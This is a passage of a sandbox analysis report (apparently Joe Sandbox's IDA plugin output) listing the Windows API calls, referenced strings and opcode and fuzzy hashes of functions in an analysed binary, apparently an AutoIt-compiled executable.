                                                            • Instruction Fuzzy Hash: E17118B6A00717ABDB16FF78DC42B5AB3A9AF04324F154269F514DB681E770ED408790
                                                            APIs
                                                            • _memset.LIBCMT ref: 003C2542
                                                            • GetMenuItemInfoW.USER32(00425890,000000FF,00000000,00000030), ref: 003C25A3
                                                            • SetMenuItemInfoW.USER32(00425890,00000004,00000000,00000030), ref: 003C25D9
                                                            • Sleep.KERNEL32(000001F4), ref: 003C25EB
                                                            • GetMenuItemCount.USER32(?), ref: 003C262F
                                                            • GetMenuItemID.USER32(?,00000000), ref: 003C264B
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 003C2675
                                                            • GetMenuItemID.USER32(?,?), ref: 003C26BA
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C2700
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C2714
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C2735
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 38f60f574c66be1445e966f9c3aa66072c0445151f23b3d72795041f6a8d5440
                                                            • Instruction ID: c92ebf092420adf6e46d6028ca54f78b7e99af665ee9335c4922232fa9e0b23b
                                                            • Opcode Fuzzy Hash: 38f60f574c66be1445e966f9c3aa66072c0445151f23b3d72795041f6a8d5440
                                                            • Instruction Fuzzy Hash: 8D617A74900249EFDB22DF64CC88EAFBBB8EB46304F15056DE842E7291D771AD15DB21
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003E6FA5
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003E6FA8
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003E6FCC
                                                            • _memset.LIBCMT ref: 003E6FDD
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E6FEF
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003E7067
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow_memset
                                                            • String ID:
                                                            • API String ID: 830647256-0
                                                            • Opcode ID: 6382548fe3a6409434a88b966b73552afa5fc9f800f3794532607a477fe6dabd
                                                            • Instruction ID: c44a6c44a9602b4559878fe6204464e5f0a16679e6fd5e7c12b6920680024a46
                                                            • Opcode Fuzzy Hash: 6382548fe3a6409434a88b966b73552afa5fc9f800f3794532607a477fe6dabd
                                                            • Instruction Fuzzy Hash: 47616C75A00258AFDB12DFA5DC81EEE77B8EB09710F104269FA14EB2E1C771AD41DB50
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003B6BBF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 003B6C18
                                                            • VariantInit.OLEAUT32(?), ref: 003B6C2A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 003B6C4A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 003B6C9D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 003B6CB1
                                                            • VariantClear.OLEAUT32(?), ref: 003B6CC6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 003B6CD3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B6CDC
                                                            • VariantClear.OLEAUT32(?), ref: 003B6CEE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B6CF9
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 503642b5a7a68e1f356157adf28282ae0800ca75e0bd473524abdf81ae1c8d75
                                                            • Instruction ID: 455aaadac2c57ab99dec0f220e1807d5859aaa1e8b9348c871cb255e6d3ebedf
                                                            • Opcode Fuzzy Hash: 503642b5a7a68e1f356157adf28282ae0800ca75e0bd473524abdf81ae1c8d75
                                                            • Instruction Fuzzy Hash: 3B4172319001199FCF12DFA5D885DEEBBBDEF08304F008169E955AB2A1CB74A945CF90
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 003D5793
                                                            • inet_addr.WSOCK32(?,?,?), ref: 003D57D8
                                                            • gethostbyname.WSOCK32(?), ref: 003D57E4
                                                            • IcmpCreateFile.IPHLPAPI ref: 003D57F2
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003D5862
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003D5878
                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003D58ED
                                                            • WSACleanup.WSOCK32 ref: 003D58F3
                                                            Strings
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 11769f82a170f0ec8194b8fbf26f7093ab1c1a090d8750dadbb13f117f21e062
                                                            • Instruction ID: f68f8e112e60e7582b3bd21dc39567e5dcf89704a69177f93e63ec3fd6923cb3
                                                            • Opcode Fuzzy Hash: 11769f82a170f0ec8194b8fbf26f7093ab1c1a090d8750dadbb13f117f21e062
                                                            • Instruction Fuzzy Hash: 7B5160726047009FDB229F24EC85B6A7BE8EF48710F15852AF956DB3E1DB70E904DB41
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 003CB4D0
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003CB546
                                                            • GetLastError.KERNEL32 ref: 003CB550
                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 003CB5BD
                                                            Strings
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 675e1ae6434c8d5a36f288ae7529787041e2d5b78085b750a87a656984a1ad7f
                                                            • Instruction ID: 4fd1f8ede322d6ec35c4ea8b2e5d407735ca3b636d81c6563b8658d8f6b4b617
                                                            • Opcode Fuzzy Hash: 675e1ae6434c8d5a36f288ae7529787041e2d5b78085b750a87a656984a1ad7f
                                                            • Instruction Fuzzy Hash: 5831A235A40209DFCB12EB68C886FADB7B8EF46310F10812EF505DB291DB719E46CB40
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003B9014
                                                            • GetDlgCtrlID.USER32 ref: 003B901F
                                                            • GetParent.USER32 ref: 003B903B
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 003B903E
                                                            • GetDlgCtrlID.USER32(?), ref: 003B9047
                                                            • GetParent.USER32(?), ref: 003B9063
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 003B9066
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: a76f3e8eff095352e97386b9004477baead8af1d5a716d5464594ea696b2e872
                                                            • Instruction ID: 66097b0db8f9d8894c910e9bed2750b433406b42a2e6d11080a7b60838521c67
                                                            • Opcode Fuzzy Hash: a76f3e8eff095352e97386b9004477baead8af1d5a716d5464594ea696b2e872
                                                            • Instruction Fuzzy Hash: 0721F870A00148BFDF16ABA0CC85EFEBB78EF45310F10421AFA619B2E1DB795815DB20
                                                            APIs
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 003BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003BAABC
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003B90FD
                                                            • GetDlgCtrlID.USER32 ref: 003B9108
                                                            • GetParent.USER32 ref: 003B9124
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 003B9127
                                                            • GetDlgCtrlID.USER32(?), ref: 003B9130
                                                            • GetParent.USER32(?), ref: 003B914C
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 003B914F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: 4eb9b38e256c53a715850f7dd550540b25e4dc252bc73eee275fa942ae6e34a0
                                                            • Instruction ID: c0ef677df9af5fdfb6554325ae050663006b3d435c3d241aa61bc28442032cbb
                                                            • Opcode Fuzzy Hash: 4eb9b38e256c53a715850f7dd550540b25e4dc252bc73eee275fa942ae6e34a0
                                                            • Instruction Fuzzy Hash: AF21C575A00148BFDF12ABA4CC85FFEBBB8EF44300F104116BA519B2A6DB759955DB20
                                                            APIs
                                                            • GetParent.USER32 ref: 003B916F
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 003B9184
                                                            • _wcscmp.LIBCMT ref: 003B9196
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003B9211
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: 2c59795b87d88ce78261c8c3677ad36871d86e5f626ace531bbf87e8bb62734f
                                                            • Instruction ID: 0cf7add47df7fa43250434b98afe61c40f08e17ccd4e354f05c41443cec0abc4
                                                            • Opcode Fuzzy Hash: 2c59795b87d88ce78261c8c3677ad36871d86e5f626ace531bbf87e8bb62734f
                                                            • Instruction Fuzzy Hash: CE110D7A6883077AFA133624DC06FE7379C9B15764B300457FB00AC8D1EE6169515658
                                                            APIs
                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 003C7A6C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ArraySafeVartype
                                                            • String ID:
                                                            • API String ID: 1725837607-0
                                                            • Opcode ID: 8f1168a4bcbd2eb4544ac780c37764c5609a822fa9d033407834b4b6e04985e4
                                                            • Instruction ID: 8a919983f27f6f705bfc2aef712300a89c12f3ac29e293452b5515f8e0e72796
                                                            • Opcode Fuzzy Hash: 8f1168a4bcbd2eb4544ac780c37764c5609a822fa9d033407834b4b6e04985e4
                                                            • Instruction Fuzzy Hash: 26B17B7190420A9FDB12DFA5C885FBEB7B8EF09321F218469E901EB291D774AD41CF90
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 003C11F0
                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C1204
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 003C120B
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C121A
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 003C122C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C1245
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C0268,?,00000001), ref: 003C1257
                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C129C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C12B1
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,003C0268,?,00000001), ref: 003C12BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 2dfbee637dd2abb5ecdaa749aed41a06e50545d4a027a5e039241e902d52b933
                                                            • Instruction ID: 54a2c79dd0e5dd300c4e984aa774cfef33a299f9bb0c04edd65e69cdb90ae413
                                                            • Opcode Fuzzy Hash: 2dfbee637dd2abb5ecdaa749aed41a06e50545d4a027a5e039241e902d52b933
                                                            • Instruction Fuzzy Hash: 7E31D279600208FFDF329F54ED88F6A37ADEB56311F138629FA01CA1A1DBB49D409B54
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0036FAA6
                                                            • OleUninitialize.OLE32(?,00000000), ref: 0036FB45
                                                            • UnregisterHotKey.USER32(?), ref: 0036FC9C
                                                            • DestroyWindow.USER32(?), ref: 003A45D6
                                                            • FreeLibrary.KERNEL32(?), ref: 003A463B
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003A4668
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 3ce72fe5271e583f7831800547455ea47578f9fe3e317b5339355523226a8422
                                                            • Instruction ID: f9151d903fa88e7a1682ca0294e1c797bbb18a0a783b0532f3acbd0704c09a86
                                                            • Opcode Fuzzy Hash: 3ce72fe5271e583f7831800547455ea47578f9fe3e317b5339355523226a8422
                                                            • Instruction Fuzzy Hash: 95A15831701212CFCB2AEF14D995A69F7A4FF56700F1582ADE80AAB265CB70AD16CF50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: ,,?$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-1974717164
                                                            • Opcode ID: cea49a2c001d6a676030bc83845cc72ad8863ea430abeb67c3a4449abdb74f9a
                                                            • Instruction ID: 9a7209d5ab0b6927d4aeac4aa2599f82439873f2efc1e81d544ffe3786caaafd
                                                            • Opcode Fuzzy Hash: cea49a2c001d6a676030bc83845cc72ad8863ea430abeb67c3a4449abdb74f9a
                                                            • Instruction Fuzzy Hash: 2791AE72A00209ABDF26DFA5DC48FAEBBB8EF45710F10855BF515AB280D7709945CFA0
                                                            APIs
                                                            • EnumChildWindows.USER32(?,003BA439), ref: 003BA377
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: 2e439f68fa390b3ddc7802046cc6b2865042b1020919e4e4deee9d3d1206e92a
                                                            • Instruction ID: b2f44d562d12013f37647763c16515b41dc8d511752d04a60322e2c0f03abed0
                                                            • Opcode Fuzzy Hash: 2e439f68fa390b3ddc7802046cc6b2865042b1020919e4e4deee9d3d1206e92a
                                                            • Instruction Fuzzy Hash: 7F91D830A00E05ABDB4AEFA4C482BEDFBB4FF04308F54C519D959AB641DF316999CB91
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00362EAE
                                                              • Part of subcall function 00361DB3: GetClientRect.USER32(?,?), ref: 00361DDC
                                                              • Part of subcall function 00361DB3: GetWindowRect.USER32(?,?), ref: 00361E1D
                                                              • Part of subcall function 00361DB3: ScreenToClient.USER32(?,?), ref: 00361E45
                                                            • GetDC.USER32 ref: 0039CD32
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0039CD45
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0039CD53
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0039CD68
                                                            • ReleaseDC.USER32(?,00000000), ref: 0039CD70
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0039CDFB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: 4b9fe9aefeeadda315f910b0cc4fa64cf9d7c52278f56eca25b74c8f625a1221
                                                            • Instruction ID: 5d835b087b54c05bd90f21f32c112e53b38f840d26886d731459ff26c5b70301
                                                            • Opcode Fuzzy Hash: 4b9fe9aefeeadda315f910b0cc4fa64cf9d7c52278f56eca25b74c8f625a1221
                                                            • Instruction Fuzzy Hash: 0B71D031900605DFCF239F64C884AAA7BB9FF49320F15927AED595A2AAC7318C41DF60
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D1A50
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003D1A7C
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003D1ABE
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003D1AD3
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D1AE0
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003D1B10
                                                            • InternetCloseHandle.WININET(00000000), ref: 003D1B57
                                                              • Part of subcall function 003D2483: GetLastError.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D2498
                                                              • Part of subcall function 003D2483: SetEvent.KERNEL32(?,?,003D1817,00000000,00000000,00000001), ref: 003D24AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                            • String ID:
                                                            • API String ID: 2603140658-3916222277
                                                            • Opcode ID: 53c4a9b028f1bea7d5d25f9b2963faa6dbd0fec0cca92561975e85fe77d888c3
                                                            • Instruction ID: 3c6c7a278c04b11905eefa6eea3639b0b315e8e75dd66b54c78fbd307499695b
                                                            • Opcode Fuzzy Hash: 53c4a9b028f1bea7d5d25f9b2963faa6dbd0fec0cca92561975e85fe77d888c3
                                                            • Instruction Fuzzy Hash: E5413DB2501219BFEB129F60DC85FBB7BACEB08354F004127FD059A281E7B49E449BA0
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003EF910), ref: 003D8D28
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003EF910), ref: 003D8D5C
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003D8ED6
                                                            • SysFreeString.OLEAUT32(?), ref: 003D8F00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            • Opcode ID: 279c036fcccabd4663b2e4de3e35100f01436d9c3187a6f7e29342abfb6dcaf6
                                                            • Instruction ID: e261311493107671eeb3c727b162029f0bb1fb4a8966abbc905c7bbbbdfe2f88
                                                            • Opcode Fuzzy Hash: 279c036fcccabd4663b2e4de3e35100f01436d9c3187a6f7e29342abfb6dcaf6
                                                            • Instruction Fuzzy Hash: B7F16872A00209EFCF16DF94D884EAEB7B9FF48314F11819AF905AB251DB31AE45CB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 003DF6B5
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DF848
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003DF86C
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DF8AC
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003DF8CE
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003DFA4A
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003DFA7C
                                                            • CloseHandle.KERNEL32(?), ref: 003DFAAB
                                                            • CloseHandle.KERNEL32(?), ref: 003DFB22
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            • Opcode ID: 3eee302d3068a3aae79fd1fd6207ed4f6015ae8990f1cb52acf16daa3fc62995
                                                            • Instruction ID: b3ddf490465bbf4c46deee1d52a7c8888b75ce806d351f920417eee7b0c6efc5
                                                            • Opcode Fuzzy Hash: 3eee302d3068a3aae79fd1fd6207ed4f6015ae8990f1cb52acf16daa3fc62995
                                                            • Instruction Fuzzy Hash: 0CE1A1326043409FC716EF24D891B6ABBE5AF85354F14856EF89A9F3A2CB30DC45CB52
                                                            APIs
                                                              • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C3697,?), ref: 003C468B
                                                              • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C3697,?), ref: 003C46A4
                                                              • Part of subcall function 003C4A31: GetFileAttributesW.KERNEL32(?,003C370B), ref: 003C4A32
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 003C4D40
                                                            • _wcscmp.LIBCMT ref: 003C4D5A
                                                            • MoveFileW.KERNEL32(?,?), ref: 003C4D75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmp
